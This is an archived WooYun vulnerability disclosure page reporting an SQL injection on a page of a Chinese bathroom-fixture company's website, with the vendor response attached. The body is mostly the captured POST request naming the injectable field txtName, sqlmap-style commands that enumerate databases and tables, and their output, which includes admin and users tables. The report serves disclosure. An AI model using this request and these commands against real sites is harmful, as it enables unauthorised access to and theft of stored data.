当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166655

漏洞标题:欧派卫浴某处sql注入漏洞导致信息泄漏

相关厂商:欧派卫浴

漏洞作者: IceKing

提交时间:2016-01-02 06:28

修复时间:2016-02-22 21:12

公开时间:2016-02-22 21:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

RT

详细说明:

POST /WebPage/index.aspx?menu=menu1 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/WebPage/index.aspx?menu=menu1
Cookie: ASP.NET_SessionId=bzriqxd1oowjiql3usqq3iij
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3389
__VIEWSTATE=%2FwEPDwULLTE3Mzc3NTUzNTEPZBYCAgEPZBYMAgEPZBYCAgUPFgIeB1Zpc2libGVoZAIDDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQROYW1lHgtfIURhdGFCb3VuZGdkEBUKD%2BmrmOmYtueuoeeQhuexuw%2FluILlnLrokKXplIDnsbsP6IGM6IO9566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexuw%2Flt6XoibrmioDmnK%2FnsbsP6K6%2B6K6h56CU5Y%2BR57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexuw%2FnlLXlrZDllYbliqHnsbsP6LSo6YeP566h55CG57G7Feivt%2BmAieaLqeiBjOS9jeexu%2BWIqxUKD%2BmrmOmYtueuoeeQhuexuw%2FluILlnLrokKXplIDnsbsP6IGM6IO9566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexuw%2Flt6XoibrmioDmnK%2FnsbsP6K6%2B6K6h56CU5Y%2BR57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexuw%2FnlLXlrZDllYbliqHnsbsP6LSo6YeP566h55CG57G7ABQrAwpnZ2dnZ2dnZ2dnZGQCBQ8QDxYGHwEFCVdvcmtQbGFjZR8CBQlXb3JrUGxhY2UfA2dkEBUHCeeZveS6keWMugblub%2Flt54J5bm%2F5bee5biCCea4hei%2FnOW4ggnml6DplKHluIIJ5q2m5rGJ5biCDOmAieaLqeWfjuW4ghUHCeeZveS6keWMugblub%2Flt54J5bm%2F5bee5biCCea4hei%2FnOW4ggnml6DplKHluIIJ5q2m5rGJ5biCABQrAwdnZ2dnZ2dnZGQCDQ8WAh4LXyFJdGVtQ291bnQCBhYMZg9kFgJmDxUDAjUzDOaLm%2BWVhuS4k%2BWRmAblub%2Flt55kAgEPZBYCZg8VAwI1MhXmoLflk4Hop4TliJLorr7orqHluIgJ55m95LqR5Yy6ZAICD2QWAmYPFQMCNTEJ5a6h5Lu35ZGYCeeZveS6keWMumQCAw9kFgJmDxUDAjUwEua0u%2BWKqOaOqOW5v%2Be7j%2BeQhgnlub%2Flt57luIJkAgQPZBYCZg8VAwI0OQ%2FlsZXnpLrorr7orqHluIgJ5bm%2F5bee5biCZAIFD2QWAmYPFQMCNDgV5q2m5rGJ6K6%2B5aSH5bel56iL5biICeatpuaxieW4gmQCDw8WAh8EAgkWEmYPZBYCZg8VAw9pbWFnZXMvc3UwOS5wbmcP6auY6Zi2566h55CG57G7D%2BmrmOmYtueuoeeQhuexu2QCAQ9kFgJmDxUDD2ltYWdlcy9zdTAyLnBuZw%2FluILlnLrokKXplIDnsbsP5biC5Zy66JCl6ZSA57G7ZAICD2QWAmYPFQMPaW1hZ2VzL3N1MDQucG5nD%2BiBjOiDveeuoeeQhuexuw%2FogYzog73nrqHnkIbnsbtkAgMPZBYCZg8VAw9pbWFnZXMvc3UwNy5wbmcP55Sf5Lqn566h55CG57G7D%2BeUn%2BS6p%2BeuoeeQhuexu2QCBA9kFgJmDxUDD2ltYWdlcy9zdTA4LnBuZw%2Flt6XoibrmioDmnK%2FnsbsP5bel6Im65oqA5pyv57G7ZAIFD2QWAmYPFQMPaW1hZ2VzL3N1MDYucG5nD%2BiuvuiuoeeglOWPkeexuw%2Forr7orqHnoJTlj5HnsbtkAgYPZBYCZg8VAw9pbWFnZXMvc3UwMy5wbmcP5L%2Bh5oGv5oqA5pyv57G7D%2BS%2FoeaBr%2BaKgOacr%2Bexu2QCBw9kFgJmDxUDD2ltYWdlcy9zdTA1LnBuZw%2FnlLXlrZDllYbliqHnsbsP55S15a2Q5ZWG5Yqh57G7ZAIID2QWAmYPFQMPaW1hZ2VzL3N1MDEucG5nD%2Bi0qOmHj%2BeuoeeQhuexuw%2FotKjph4%2FnrqHnkIbnsbtkAhEPFgIfBAIFFgpmD2QWAmYPFQMDMTQ0POasp%2Ba0vuWGjea3u%2BauiuiNo%2B%2B8jOiNo%2BiOt%2BKAnOS4reWbveWutuWxhe%2B8iOijhemlsOeVjO%2B8iS4uLgoyMDE1LTEyLTAzZAIBD2QWAmYPFQMDMTQzPOS4gOW6p%2BWfjui2hei2iuS4gOS4quWbve%2B8jOasp%2Ba0vuWMl%2BS6rOWIhuWFrOWPuOS4mue7qeegtC4uLgoyMDE1LTExLTMwZAICD2QWAmYPFQMCOTg55qyn5rS%2B5aSn5a625bGF5LiA54Ku6ICM57qi77yM5Y%2BR5bGV5Y%2BM6amx5Yqo5Yq%2F5LiN5Y%2Bv5oyhCjIwMTUtMTAtMTNkAgMPZBYCZg8VAwI5NzrmrKfmtL465Lit5Zu95aKZ57q45aKZ5biD6KGM5Lia5Y2B5aSn56eR5oqA5Yib5paw5Zu95a62Li4uCjIwMTUtMTAtMTNkAgQPZBYCZg8VAwI5OTbmr48xOOWwj%2BaXtuivnueUnzHlrrbpl6jlupfvvIHmrKfmtL7ooaPmn5zlhajlsYvlrpouLi4KMjAxNS0xMC0xMmRk90GDsknAM5BsAJHQ4Wbpxt%2B9VM7q3RvXldktMZQWdoQ%3D&__VIEWSTATEGENERATOR=0E6ECABE&__EVENTVALIDATION=%2FwEdABauezuhvMwHfAx0gKbQGkRRaetTzx4Eqm%2FnW2S3CtDUUdog5wAzIL1VHdmjsKEMOHRczdreINUbf4yxOolNOzhbJLG6K4BgUAOBxbrlG83Z3iC9kp%2FafeVuR5n0xL1NEUc%2FTvP4BzRaqCWBQciRos0CVDYb%2BukiJFUCOsq3RA5HB1BkmZpkGNm45dLtdxRIFP2FE67U4M81keTwHWm94gm%2FectMBzCyCfGzkcen5%2F2i7nVzM%2Fi0jOf7P87DNdVxr%2B0qY1QzpnqmEH5z8Bd1evAq6pztVnkeGCoWtE70U%2B3I4nqAmwfbk1dyUhFAuyhfk1NTi4tr3KMw7Y%2B0WwDMdpoWUvYr79k2J1YqW7zHPD7pTZuTXwDGinyP2ZC%2BeiSNUTEjD5q%2Bp%2FdfoLyDT6T%2FO1E7ozoJZpuXxkpOVJKRbHyuHj9YyyR4qjX0bKJ2X6bXV1PN%2BDvxnwFeFeJ9MIBWR693R0l9yvmLjn0tQ3kSHSrnxTifVkN9rTmuwCq9833rvzQ%3D&Head1%24hidMenu=menu1&ddlType=&ddlWorkPlace=&txtName=%25&Button2=
-r f:\k.txt -p txtName
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
-r f:\k.txt --dbs
available databases [24]:
[*] Lottery20y
[*] lotteryoppeinc
[*] master
[*] MemberLottery
[*] model
[*] msdb
[*] ocmap_zs
[*] OpDesign
[*] OpGrandPrix2011
[*] OppeinData
[*] OppeinGeneral
[*] OppeinPoint2012
[*] OpRecruitment
[*] Optima2009
[*] OptimaBBS2009
[*] OptimaLottery
[*] optimavoteweb
[*] OpWYDesign
[*] OPZPWeb
[*] PonderWAF
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] vote
-r f:\k.txt --tables
Current database
[5 tables]
+--------------------+
| dbo.admin          |
| dbo.news           |
| dbo.sysconstraints |
| dbo.sysusers       |
| dbo.users          |
+--------------------+


1.png


2.png


3.png


4.png

漏洞证明:

3.png

修复方案:

修复

版权声明:转载请注明来源 IceKing@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-08 21:12

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无